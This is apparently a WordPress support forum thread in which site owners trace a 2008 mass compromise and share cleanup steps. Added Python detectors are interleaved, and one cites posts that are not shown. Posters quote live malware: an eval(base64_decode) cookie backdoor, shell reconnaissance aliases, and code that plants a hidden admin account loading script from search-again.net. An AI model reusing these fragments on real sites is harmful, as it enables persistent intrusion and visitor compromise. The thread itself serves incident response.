
Security issue, multiple sites (54 posts)

  1. fpmsummer
    Posted 8 years ago #

    This issue actually involves several sites, running versions 2.1.3, 2.3, 2.3.1, 2.3.2, 2.3.3 and 2.5

    A couple of the sites had wp-content/uploads writable so they could upload images for use in posts, and files in wp-content/themes writable so they could make theme updates from inside WP.

    Back in early March, I found that several sites had been hit with the ro8kfbsmag.txt hack as mentioned in several threads here, and I'd cleaned those up and upgraded to 2.3.3, since 2.5 wasn't yet available as a release.

    This past weekend, I discovered several of those sites plus a few additional ones, including 2 brand new sites with 2.5 installed, had many of their files in the writable directories compromised, a bunch of suspicious files uploaded, and database modifications that I cannot explain.

    I'm still trying to unravel the mess and clean it up, but here's a rundown of tell-tale signs I've found.

    Check any .php file for this code added to the top of the file:
    <?php if(md5($_COOKIE['_wp_debugger'])=="--hash excised--"){ eval(base64_decode($_POST['file'])); exit; } ?>

    See if there are any files in writable directories that have the same name as an existing file with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files will be executables that when called from a browser will display a fake "404 Not Found" error, but if called from a script with the matching hash from one of the hacked PHP scripts, will display system info about the server your site is sitting on. Haven't yet figured out where or how that info is sent to anyone.

    I can send a copy of the script to anyone in WP security if needed, but I don't know if this kind of thing is preferred to be attached, inline, or zipped, or anything.

    Also see if there's a wp-info.txt file anywhere in your hierarchy. This file will contain userinfo dumped from the MySQL database... usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.

    One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn't been upgraded yet, was the silent addition of the user "WordPress", with no info save a password, and an add date of all zeroes. There's also no indication of user level in the database, and the user doesn't show up in the User menu. However, when I was going through and deleting unnecessary "admin" logins, "WordPress" came up as one of the user options to reassign posts to... otherwise it might have been a while before I'd found that buried in the database.

    So I've asked all the users on those sites to update their passwords, even if they'd just changed them after the ro8kfbsmag hack, but I have to wonder if I missed anything when cleaning up after that hack that they used to continue to get in and do the more widespread and scary stuff of planting of these new scripts to collect system info.

    As far as I can tell, some of these sites may have been compromised for as long as a month, but all of the added files I've listed here were added on Apr 10 and Apr 11, except for one site that seems to have had those changes made on Apr 5.

    I am in the process of changing the DB passwords on those sites, and deleting the new "WordPress" user, but any insight on where this might have started would be welcomed. This new user also happened on sites ranging from 2.1 to 2.3 to 2.5

    What I don't know yet is if one site was the "in" door, and the rest were compromised by the one script, or if the sites were individually hacked the same way.

  2. fpmsummer
    Posted 8 years ago #

    Addendum: I only just noticed this this morning while still cleaning up, and it seems like they changed the WP version to 2.5 in the database.

    I'm logged into a site I know is still running 2.1.3, but the footer in the admin panels says 2.5 now. I still haven't found a clue about this invisible user "WordPress" with no info about privileges, though.

  3. Roy
    Posted 8 years ago #

    There already is a thread about this subject and that one has just become active again. Maybe you want to join:

  4. jedsundwall
    Posted 8 years ago #


    I think FPMSummer is experiencing something different than what's being discussed on that other thread. I'm having the EXACT same problem. I've had to revert my server to a week and a half old backup. It's a huge pain. I can't tell if they accessed the wp-info.txt, but I deleted it right away.

  5. fpmsummer
    Posted 8 years ago #


    that's a different hack, but one that hit some sites on our ISP's shared server back in January/February. They removed like 8-10 instances of that .txt file.


    what version(s) of WP are you running? I had thought that a 2.3.x site that still had user registration turned on might be responsible, but at this point I honestly don't know where the first point of entry was, and I'm still not sure all of the users on this server have changed their passwords. I have changed all the database passwords, though.

  6. jedsundwall
    Posted 8 years ago #

    Like you, I had a number of sites running different versions. I believe most of them were the latest version before 2.5 was released. It's difficult to tell because the hacker has changed all of my WP dashboards to say they're running 2.5.

    All of the weird files showed up on April 10th or 11th, and I didn't notice them until today. My hosting company keeps server logs for more than a couple of days, so I can't tell what the point of entry was either.

    I'm sorry I'm not of much help. All I know is that nothing obviously bad has happened yet. As soon as my server's finished reverting back to April 5th, I'll be upgrading everything right away.

  7. appleo
    Posted 8 years ago #

    No real answers here either. This is just to confirm a similar situation. A server with 100+ vhosted accounts, and almost all the wordpress installations (various versions thru 2.5) were seemingly hit. All on the 11th, and every one within several minutes, according to timestamps. Which would seem to argue for a single point of entry. But the sheer volume (hundreds of files) might suggest otherwise. Almost everything was either a wordpress file, or something disguised to look like a wordpress file. The script did look for writable areas, and occasionally found non-wordpress stuff, but that was the exception. There were two signatures. Files altered as FPMSummer posted with the first line changed. And new files where all the voodoo was (422 lines), with the first line:

    <?php if(md5($_COOKIE['qwerty'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){

    I believe all of these were 'qwerty' cookies. Grepping for either of those cookie names will find all the filesystem damage. A sample of that code:

    if($os_type == 'nix'){
    $os .= execute('sysctl -n kern.ostype');
    $os .= execute('sysctl -n kern.osrelease');
    $os .= execute('sysctl -n kernel.ostype');
    $os .= execute('sysctl -n kernel.osrelease');
    if(empty($user)) $user = execute('id');
    $aliases = array(
    '' => '',
    'find suid files'=>'find / -type f -perm -04000 -ls',
    'find sgid files'=>'find / -type f -perm -02000 -ls',
    'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
    'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
    'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
    'show opened ports'=>'netstat -an | grep -i listen',
    $os_name .= execute('ver');
    $user .= execute('echo %username%');
    $aliases = array(
    '' => '',
    'show runing services' => 'net start',
    'show process list' => 'tasklist'
  8. fpmsummer
    Posted 8 years ago #

    Yep, that's exactly what showed up on my sites, and all on Apr 10 and Apr 11. The Apr 11 happened in two waves, 3 hours apart. The first batch of files seemed to have all been renamed _old.php, and the second batch of files were the exact same files, but with _new.php.

    I had a lot of WP files with that qwerty cookie added, and several instances of the wp-info.txt with the mysql usernames/passwords dump.

    I did find one file dated Apr 5, but I also saw a lot of log activity going back into March.

    And how did they change my Dashboard to show WP 2.5, when they weren't running 2.5?

  9. ia
    Posted 8 years ago #

    Guys, I think somebody should "name" this vulnerability so it's easier to remember. Also, I wrote about it here.

    Yep, it happened to me too. I first saw the version 2.5 string in the footer and was immediately suspicious, but at first I thought it was because I used the wpau plugin instead of the cpanel upgrade (which I used to install WP the first time around). Turns out you have to trust your instincts. :)

    I'm also surprised all this happened on April 11 (mine on the 12th) as well.

    I've been watching this page and will continue to do so. I hope more people contribute, because it was only a few days ago when I tried googling "wp-info.txt" and practically nothing came up.

  10. whooami
    Posted 8 years ago #

    I would agree with anyone who says this isn't just a 2.5 problem.


    The file itself appears to be gone, but because of Google we can get more info.

    That's a 2.3.3 install now. There's no telling what it was on March 19


    Furthermore, people running anything other than 2.3.3, 2.5, or 2.0.11 have taken their security into their own hands for some time, and really ought not be surprised to wake up to a site that has been exploited.

  11. here
    Posted 8 years ago #

    Codex page will hopefully help document:


  12. goodspeed1
    Posted 8 years ago #

    We experienced everything mentioned above over the last couple of days, April 6th & 12th. It seems systematic: once the accounts had been compromised, the hacking began.

    Here's a few more insights on what happened: http://www.abelcheung.org/advisory/20071210-wordpress-charset.txt

    steps taken:

    1. Changed the admin (level 10) account passwords
    2. Deleted the 'mysterious' WordPress admin user
    3. Upgraded most of major blogs to 2.5

    So far so good. (crossing my fingers)

  13. here
    Posted 8 years ago #

  14. indigothirdeye
    Posted 8 years ago #

    The hack I believe used a vulnerability in the wp-admin/theme-editor.php. Luckily, we have a script that checks for code changes, and caught the exploit within a half hour of the attack. The logs from our site that was hacked had this in them:

    - - [15/Apr/2008:14:40:02 -0700] "GET /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070309 Firefox/"
    - - [15/Apr/2008:14:40:03 -0700] "GET /wp-login.php?redirect_to=%2Fwp-admin%2Ftheme-editor.php%3Ffile%3Dwp-content%2Fthemes%2Fdefault%2Findex.php%26theme%3DWordPress%2BDefault HTTP/1.1" 200 2043 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070309 Firefox/"
    - - [15/Apr/2008:14:40:03 -0700] "GET /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 200 9620 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070309 Firefox/"
    - - [15/Apr/2008:14:40:04 -0700] "POST /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070309 Firefox/"
    - - [15/Apr/2008:14:40:04 -0700] "GET /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default&a=te HTTP/1.1" 200 9832 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070309 Firefox/"
    - - [15/Apr/2008:14:40:05 -0700] "POST /wp-content/themes/default/index.php HTTP/1.1" 200 43 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070309 Firefox/"
    - - [15/Apr/2008:14:40:06 -0700] "POST /wp-content/themes/default/index.php HTTP/1.1" 200 7895 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070309 Firefox/"
    - - [15/Apr/2008:14:40:07 -0700] "POST /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070309 Firefox/"
    - - [15/Apr/2008:14:40:08 -0700] "GET /wp-login.php HTTP/1.1" 200 1835 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070309 Firefox/"

    Both sites had the WordPress and WordPressx user added to the wp-users table. Neither had a wp-info.txt luckily, but many of the .giff and .pngg's were found. There were also 2 files in the /tmp/ directory numbered 1 and 2 with full directory listings of the sites. We immediately launched a "Deny any" on the theme-editor.php files to prevent further attacks using this method and cleaned up what we could find.

  15. whooami
    Posted 8 years ago #

    That's not the exploit. That's the file access that's done after someone has admin access. AND if you attempt to call that file without being logged in and having the proper permissions, you will find you are promptly redirected to log in, just as you ought to be.

    You cannot access that file as a simple subscriber. You must be an admin.

    Devs (Donncha, specifically) have already looked at something similar weeks ago, when I originally saw it happening on another blog that had been exploited.

    Want to know what ultimately solved the hacking?

    1. upgrading the blog
    2. changing the admin passwords
    3. changing all the cookies.

    And the deny all.. that just forces Apache to do work it doesn't need to. If you're going to block everyone from using the file, delete it, or ctrl-k the content.

    You don't gain anything by looking at 403's -- they're all proxies or rooted shells.

    None of this is new, and I'm willing to continue playing devil's advocate and say that until someone comes up with real evidence that 2.5, or even 2.3 is the root cause of the problem.. that it's useless conjecture and fear mongering.

    If someone has admin access they can do whatever your file permissions allow, it's just that simple. And if they can write to a file, they can create a root shell. If they can create a root shell, they can add users to your database, etc.. They also no longer need admin access once the PHP root shell is in place.

    That's why when a new version comes out, people are urged to upgrade. Countless numbers don't.

    This is specifically why I have suggested setting up logging on some of these blogs --

    1. You're missing the key piece of the puzzle: how they got admin access in the first place.


    In fact, you posted the login in your paste above. They can be seen logging in.
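    Posts 14 and 15 between them make a detection point: the log shows a login to wp-login.php, a POST to theme-editor.php for a named theme file, and then direct requests to that very file seconds later. As an added example (not code from this thread), the Python below parses Apache combined-format lines and flags any client that writes a file through theme-editor.php and then requests that file within a short window. The sample log is constructed to mirror post 14's sequence; the client IP (which the paste had stripped) and the user agent are placeholders.

```python
"""Flag the theme-editor write-then-request sequence from post 14 in Apache combined logs."""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Apache combined log format. Status and size may be "-" on redirects.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return a dict for one log line, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    url = urlsplit(e["target"])
    e["path"] = url.path
    e["query"] = parse_qs(url.query)
    return e


def detect_theme_editor_abuse(lines, window=timedelta(minutes=10)):
    """Return one alert per (client, file) where a POST to theme-editor.php naming
    file=X is followed, within `window`, by a direct request for /X from the same client."""
    events = [e for e in map(parse_line, lines) if e]
    events.sort(key=lambda e: e["ts"])
    edits = {}   # ip -> [(edit time, edited file), ...]
    alerts = {}  # (ip, file) -> alert record
    for e in events:
        ip = e["ip"]
        if e["method"] == "POST" and e["path"] == "/wp-admin/theme-editor.php":
            target = e["query"].get("file", [""])[0]
            if target:
                edits.setdefault(ip, []).append((e["ts"], target.lstrip("/")))
            continue
        for edit_ts, edited in edits.get(ip, []):
            if e["path"] == "/" + edited and timedelta(0) <= e["ts"] - edit_ts <= window:
                rec = alerts.setdefault((ip, edited),
                                        {"ip": ip, "file": edited, "edited_at": edit_ts, "hits": []})
                rec["hits"].append((e["ts"], e["method"], e["status"]))
                break
    return list(alerts.values())


# Constructed sample modelled on post 14: 203.0.113.10 is a documentation-range placeholder
# for the stripped client IP; 198.51.100.7 is an unrelated visitor.
UA = '"Mozilla/5.0 (constructed placeholder)"'
TE = "/wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default"
SAMPLE_LOG = [
    f'203.0.113.10 - - [15/Apr/2008:14:40:02 -0700] "GET {TE} HTTP/1.1" 302 - "-" {UA}',
    f'203.0.113.10 - - [15/Apr/2008:14:40:03 -0700] "GET /wp-login.php?redirect_to=%2Fwp-admin%2Ftheme-editor.php HTTP/1.1" 200 2043 "-" {UA}',
    f'203.0.113.10 - - [15/Apr/2008:14:40:03 -0700] "GET {TE} HTTP/1.1" 200 9620 "-" {UA}',
    f'203.0.113.10 - - [15/Apr/2008:14:40:04 -0700] "POST {TE} HTTP/1.1" 302 - "-" {UA}',
    f'203.0.113.10 - - [15/Apr/2008:14:40:04 -0700] "GET {TE}&a=te HTTP/1.1" 200 9832 "-" {UA}',
    f'203.0.113.10 - - [15/Apr/2008:14:40:05 -0700] "POST /wp-content/themes/default/index.php HTTP/1.1" 200 43 "-" {UA}',
    f'203.0.113.10 - - [15/Apr/2008:14:40:06 -0700] "POST /wp-content/themes/default/index.php HTTP/1.1" 200 7895 "-" {UA}',
    f'203.0.113.10 - - [15/Apr/2008:14:40:07 -0700] "POST {TE} HTTP/1.1" 302 - "-" {UA}',
    f'203.0.113.10 - - [15/Apr/2008:14:40:08 -0700] "GET /wp-login.php HTTP/1.1" 200 1835 "-" {UA}',
    f'198.51.100.7 - - [15/Apr/2008:14:41:00 -0700] "GET /index.php HTTP/1.1" 200 5120 "-" {UA}',
]


def demo():
    return detect_theme_editor_abuse(SAMPLE_LOG)


if __name__ == "__main__":
    for a in demo():
        print(f"{a['ip']} edited {a['file']} at {a['edited_at']:%H:%M:%S}, then requested it {len(a['hits'])}x")
```

    Run against a real log with something like detect_theme_editor_abuse(open(path)). The rule deliberately keys on the editor POST rather than on the login, because, as post 15 says, the login itself is legitimate traffic; it is the edit-then-execute pair that marks a stolen admin session being used to plant code.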

  16. ia
    Posted 8 years ago #

    Yeah, I do want to know how they got admin access as well. FYI, after I wrote about this security issue, the "WordPress" user appeared in the database(s) again. Does this mean I'd have to generate new database passwords all over again? Sigh.

  17. whooami
    Posted 8 years ago #

  18. fpmsummer
    Posted 8 years ago #

    If whooami found evidence that this particular hack was in use on March 19, there's no way that 2.5 was the "in" door, unless someone was using an RC.

    I still think that it was a 2.3.x site on my server that was hit first, then the script looking for write permissions did the rest, and it didn't matter what version a site was running after that. Once I'm sure everything here's clean again, I'll go back to the logs.

    I still want to know how they added that invisible WordPress user.

  19. Steve Taylor
    Posted 8 years ago #

    Sorry to hear y'all had the same problem - but nice to know I'm not alone! Same thing - April 11th, new files, code inserted into existing files, new "WordPress" admin account...

    One other indicator I found was entries in the wp_usermeta table - there seemed to be ones in there indicating admin permissions for entries in wp_user that didn't exist.

    I had 2.1.x installations on my server together with 2.3.3 and 2.5. I guessed that the former were hit and the latter suffered from that - I was stupidly running all installations through the same MySQL user login. All changed now...

    I did notice a new "WordPress" admin account pop up in a 2.5 installation (one closed from public access by .htaccess password), even after I'd deleted it. I subsequently found a *php.jpgg or whatever file I'd missed on the server; no more admin accounts since deleting that.

    Anyway, I don't have enough knowledge to determine how all this happened - just wanted to add my bits in case it clues someone else in.

    Now I've got separate DB logins for all installations, upgraded all to 2.5, changed "wp_" table prefix to 8 random characters, changed "admin" username, changed all WP passwords to strong random strings. I've learned a lot about security, but I'm exhausted! Touch wood this is the end of it.

  20. cweb
    Posted 8 years ago #

    All of my sites were hit by this, about five hosted on Media Temple. I'm sure the spam-bot went for the popular ISP IP ranges when scanning for WP installations.

    If it helps anyone, I did the following per recommendations from this article.

    This page was a lifesaver:

    1. keep searching for wp-info.txt to make sure it's not around, if so, delete it.

    find . -name 'wp-info*'

    2. get rid of all _new _old .jpgg .giff and .pngg

    find . -name '*_old*' -exec rm '{}' \;

    3. find all instances of the backdoor, which looks like

    <?php if(md5($_COOKIE['_wp_debugger'])=="randomhash"){

    Use grep to find this:

    grep -ri _wp_debugger * *.php

    Then do a global search and replace (for now) to replace _wp_debugger with 'unknown'

    find . -name '*.php' | xargs perl -pi -e 's/_wp_debugger/unknown/'

    4. I upgraded all installations to 2.5

    5. I used phpmyadmin to remove the hidden 'wordpress' user account from the wp_users table in the database

    6. I reset all user passwords by replacing the MD5 hash through the database directly.

    I don't trust what files this hack might have tainted. For example, does it know when I've used the admin tools to reset passwords?

    My questions:

    - Does WordPress have any more details about what files this hack has tainted?
    - Do we know how the wp-info.txt file would be generated? I didn't see it in my folders, so I'm a little worried that it created a cron job or something that hasn't kicked off yet - any ideas?
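    Post 1 lists the file-level indicators (the cookie-gated hook on the first line of PHP files, decoy copies with _new/_old/.pngg/.jpgg/.giff names, the wp-info.txt dump) and post 20 turns them into find and grep commands. As an added example, not code from this thread, the Python below does the same sweep in one pass over a directory tree and also catches the PHP-under-an-image-name files from posts 27 and 28. The sample tree it builds is constructed for the demo; the hashes in it are placeholders, not hashes seen in the wild.

```python
"""Filesystem sweep for the indicators of compromise listed in this thread."""
import re
import tempfile
from pathlib import Path

# Indicators from the thread: a cookie-gated backdoor prepended to PHP files (cookie names
# seen: _wp_debugger, qwerty), decoy copies of real files with a bogus extension, PHP hidden
# behind image extensions, and the wp-info.txt credential dump.
BACKDOOR_RE = re.compile(
    r"md5\(\s*\$_COOKIE\[\s*['\"]([A-Za-z0-9_]+)['\"]\s*\]\s*\)\s*==\s*['\"]([0-9a-f]{32})['\"]"
)
EVAL_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\[")
DECOY_SUFFIXES = ("_new.php", "_old.php", ".php.pngg", ".php.jpgg", ".php.giff")
IMAGE_SUFFIXES = (".gif", ".jpg", ".jpeg", ".png")
DUMP_NAMES = {"wp-info.txt"}


def scan_tree(root):
    """Walk root and return a sorted list of (relative path, reason) findings."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        name = path.name.lower()
        if name in DUMP_NAMES:
            findings.append((rel, "credential dump file"))
            continue
        if name.endswith(DECOY_SUFFIXES):
            findings.append((rel, "decoy/backdoor file name"))
        # The thread reports the hook on the first line, so the head of the file is enough.
        try:
            head = path.read_bytes()[:4096].decode("utf-8", "replace")
        except OSError:
            continue
        if name.endswith(IMAGE_SUFFIXES) and head.lstrip().startswith("<?"):
            findings.append((rel, "PHP code under an image extension"))
        m = BACKDOOR_RE.search(head)
        if m:
            findings.append((rel, f"cookie-gated backdoor (cookie={m.group(1)})"))
        elif EVAL_RE.search(head):
            findings.append((rel, "eval(base64_decode()) of request input"))
    return sorted(findings)


def build_demo_tree(base):
    """Write a small constructed sample tree mirroring the thread's indicators (placeholder hashes)."""
    base = Path(base)
    files = {
        "wp-content/themes/default/index.php": (
            b'<?php if(md5($_COOKIE[\'_wp_debugger\'])=="0123456789abcdef0123456789abcdef")'
            b'{ eval(base64_decode($_POST[\'file\'])); exit; } ?>\n<?php get_header(); ?>\n'
        ),
        "wp-content/themes/default/index_old.php":
            b'<?php if(md5($_COOKIE[\'qwerty\'])=="fedcba9876543210fedcba9876543210"){ /* ... */ } ?>\n',
        "wp-content/uploads/wp-info.txt": b"user:hash-placeholder\n",
        "wp-content/uploads/404_old.gif": b"<?php /* constructed: PHP hiding behind an image name */ ?>\n",
        "wp-content/uploads/photo.jpg": b"\xff\xd8\xff\xe0 constructed jpeg header",
        "wp-includes/clean.php": b"<?php function ok() { return 1; } ?>\n",
    }
    for rel, content in files.items():
        p = base / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(content)


def demo():
    """Build the sample tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        build_demo_tree(d)
        return scan_tree(d)


if __name__ == "__main__":
    for rel, why in demo():
        print(f"{why:45} {rel}")
```

    Point scan_tree at the web root of each vhost. Files it names should be quarantined and compared against a clean copy of the same WordPress release rather than edited in place, since post 26 shows the same sites being re-seeded days after a partial cleanup.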

  21. BurstCollective
    Posted 8 years ago #

    It seems like this is the type of attack we've suffered, as well, but we still get live hits when adding "/?p=4019.html" to the end of our blog URL (http://blog.burstlabs.com).

    Any ideas? I'm so frustrated and stumped right now. Argh.

  22. BurstCollective
    Posted 8 years ago #

    by "live hits" I mean pages that are obviously spam for drug companies, etc., but I can't find any post/page that is numbered 4019 (to use the above example) to delete.

  23. boscardin
    Posted 8 years ago #

    Apparently, it doesn't just affect the WordPress files. I've seen files created in other folders as well, so I'm going through each and every folder in my domain to remove these files.

  24. cweb
    Posted 8 years ago #

    Hey boscardin, what types of files are you seeing? Has anyone seen a full analysis of this hack other than the links mentioned here?

    So far it seems like my cleanup went okay but maybe I should be looking for more signs.

  25. cave-bit
    Posted 8 years ago #

    Excuse my English... We have the problem on the Italian site speleo scintilena.com.
    I found the file that creates the username WordPress; the password is the site name ($_SERVER['HTTP_HOST']). (This password in the users table is encrypted with md5.)
    The filename is ha.php and I found it in the wp-admin directory.
    But I have no idea how it was uploaded.
    I think it was uploaded with some plugin, but I'm not sure.
    I found another site with this problem and I did not damage it... but it is a big problem.
    We tracked the user WordPress on the scintilena site and its IP is (we logged this user and redirected them to the FBI site)
    a server located in the USA, with the company's head office in Panama (Whois info).
    I posted the code for study:

    function add_hidden_user() {
         global $wpdb;
         $user_login = "WordPress"; $user_pass = md5($_SERVER['HTTP_HOST']);
         $js_server = "http://search-again.net/js/js.js"; if(strlen($js_server)>33){die("Server does not fit to cell!");};
         if($wpdb->get_var("SELECT ID FROM $wpdb->users WHERE user_login='$user_login'")>0){
         	$wpdb->query("DELETE FROM $wpdb->users WHERE user_login='$user_login'");
         $users = $wpdb->get_results("SELECT * FROM $wpdb->users LIMIT 1");
         if(array_key_exists('display_name',$users[0])) {
              $query = "INSERT INTO $wpdb->users
                   (user_login, user_pass)
                   ('$user_login', '$user_pass')";
              $wpdb->query( $query );
              $user_id = $wpdb->insert_id;
              $up = array('first_name','last_name','nickname','description','jabber','aim','yim');
         <b id="user_superuser"><script language="JavaScript">
         var setUserName = function(){
                   var t=document.getElementById("user_superuser");
                   var tags = document.getElementsByTagName("H3");
                   var s = " shown below";
                   for (var i = 0; i < tags.length; i++) {
                        var t=tags[i].innerHTML;
                        var h=tags[i];
                             s =(parseInt(t)-1)+s;
                             t = document.createTextNode(s);
              foreach ($up as $k) {
                   if ($k='first_name') {$v=$wpdb->escape($js);};
                   update_usermeta( $user_id, $k, $v );
              $user = new WP_User($user_id);
              wp_cache_delete($user_id, 'users');
              wp_cache_delete($user_login, 'userlogins');
              if(md5($wpdb->get_var("SELECT meta_value FROM $wpdb->usermeta WHERE user_id='$user_id' AND meta_key='first_name'"))==md5($js)){
                   return "sucess";
              } else {
                   $wpdb->query("DELETE FROM $wpdb->usermeta WHERE user_id='$user_id'");
                   $wpdb->query("DELETE FROM $wpdb->users WHERE id='$user_id'");
                   return "failed";
         } else {
              $js1 = '<b id="ux"><script language="JavaScript"';
              $js2 = ' src="'.$js_server.'"></script>';
              $query = "INSERT INTO $wpdb->users
                   (user_login, user_pass, user_level, user_firstname, user_lastname)
                   ('$user_login', '$user_pass', 10,'".$wpdb->escape($js1)."','".$wpdb->escape($js2)."' )";
              $wpdb->query( $query );
              $user_id = $wpdb->insert_id;
              if(md5($wpdb->get_var("SELECT user_firstname FROM $wpdb->users WHERE id='$user_id'"))==md5($js1) &&
                 md5($wpdb->get_var("SELECT user_lastname FROM $wpdb->users WHERE id='$user_id'"))==md5($js2)
                   return 1;
              } else {
                   $wpdb->query("DELETE FROM $wpdb->users WHERE id='$user_id'");
                   return 0;

    If you solve it, please post.
    Thanks and.. ciauuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuz
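    Posts 1, 19 and 25 describe the database side of this: a "WordPress" account that does not appear in the Users screen, a registration date of all zeroes, usermeta rows granting admin rights to user IDs that no longer exist, and profile fields carrying a script tag. As an added example (not code from this thread), the Python below runs three audit queries against the users and usermeta tables. It uses an in-memory sqlite3 copy of the two tables only so it runs stand-alone; the SQL is plain enough to run against MySQL with the real tables. The sample rows are constructed, with placeholder hashes and an example.invalid host in place of any real URL. That a row with no capabilities meta stays off the Users screen is my assumption about how the account stayed hidden, not something the thread establishes.

```python
"""Audit the users and usermeta tables for the hidden-account indicators described in the thread."""
import sqlite3

# Minimal stand-ins for the two WordPress tables (constructed, not a full schema).
SCHEMA = """
CREATE TABLE wp_users (
    ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT, user_email TEXT,
    user_registered TEXT, display_name TEXT);
CREATE TABLE wp_usermeta (
    umeta_id INTEGER PRIMARY KEY, user_id INTEGER, meta_key TEXT, meta_value TEXT);
"""

# Constructed sample rows: two normal accounts, the two hidden accounts named in the thread
# (zero registration date, no role meta), one meta row for a nonexistent user.
SAMPLE_USERS = [
    (1, "admin", "hash-placeholder", "admin@example.invalid", "2008-01-10 09:00:00", "admin"),
    (2, "editor", "hash-placeholder", "editor@example.invalid", "2008-02-02 12:00:00", "Editor"),
    (3, "WordPress", "hash-placeholder", "", "0000-00-00 00:00:00", ""),
    (4, "WordPressx", "hash-placeholder", "", "0000-00-00 00:00:00", ""),
]
SAMPLE_USERMETA = [
    (1, 1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (2, 1, "wp_user_level", "10"),
    (3, 2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
    (4, 3, "first_name", '<b id="ux"><script language="JavaScript" src="http://example.invalid/js.js"></script>'),
    (5, 9, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),   # orphan: no user 9
]


def audit(conn, prefix="wp_"):
    """Return three indicator lists. `prefix` is the trusted table prefix from wp-config.php
    (it is interpolated into table names, so it must never come from user input)."""
    users, meta = f"{prefix}users", f"{prefix}usermeta"
    # 1. Accounts with no role meta (assumed to be why they are invisible in the admin UI)
    #    or with the all-zero registration date fpmsummer reported.
    hidden = conn.execute(f"""
        SELECT u.ID, u.user_login, u.user_registered
        FROM {users} u
        LEFT JOIN {meta} m ON m.user_id = u.ID AND m.meta_key = ?
        WHERE m.umeta_id IS NULL OR u.user_registered = '0000-00-00 00:00:00'
        ORDER BY u.ID""", (f"{prefix}capabilities",)).fetchall()
    # 2. Usermeta rows whose user_id has no matching users row (Steve Taylor's observation).
    orphan_meta = conn.execute(f"""
        SELECT m.umeta_id, m.user_id, m.meta_key
        FROM {meta} m LEFT JOIN {users} u ON u.ID = m.user_id
        WHERE u.ID IS NULL ORDER BY m.umeta_id""").fetchall()
    # 3. Profile fields carrying markup, as in the ha.php code cave-bit posted.
    script_fields = conn.execute(f"""
        SELECT user_id, meta_key FROM {meta}
        WHERE meta_value LIKE '%<script%' OR meta_value LIKE '%<b id=%'
        UNION ALL
        SELECT ID AS user_id, 'display_name' AS meta_key FROM {users}
        WHERE display_name LIKE '%<script%'
        ORDER BY user_id""").fetchall()
    return {"hidden_users": hidden, "orphan_usermeta": orphan_meta, "script_in_profile": script_fields}


def demo():
    """Load the constructed rows into an in-memory database and audit them."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO wp_users VALUES (?,?,?,?,?,?)", SAMPLE_USERS)
    conn.executemany("INSERT INTO wp_usermeta VALUES (?,?,?,?)", SAMPLE_USERMETA)
    return audit(conn)


if __name__ == "__main__":
    for section, rows in demo().items():
        print(section)
        for row in rows:
            print("   ", row)
```

    On a real install, run the three SELECTs through phpMyAdmin or the mysql client with the site's own prefix; deleting a flagged user must be paired with deleting its usermeta rows, otherwise the second query will keep reporting the leftovers.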

  26. fpmsummer
    Posted 8 years ago #

    Just as a followup, I was playing around with a database on one of the sites that had been hit (trying different things to resolve the "WordPress database error Duplicate entry" errors we've been getting from podpress ever since sites upgraded to 2.3), and I found something disturbing...

    In table wp_options, record active_plugins, I found 2 "active" plugins that don't register in the listing of plugins, and that reference bad files from the hacking.


    I was able to change the number of plugins and delete these extra entries, but I'm concerned because these didn't show up on a casual browse of the fields. I happened to see it when I was playing with a mysqldump of the database.

    It doesn't look like it was newly added... but it looks like this next round of files was added on Apr 14... probably while I was still cleaning up the mess from Apr 11.

    I hadn't noticed that anyone else here mentioned that little addition, like the invisible user WordPress that was added, but I have no idea what the invisible plugin is supposed to do. Could that session file in /tmp be a PHP shell? What should I look for to decode what it is?

  27. appleo
    Posted 8 years ago #

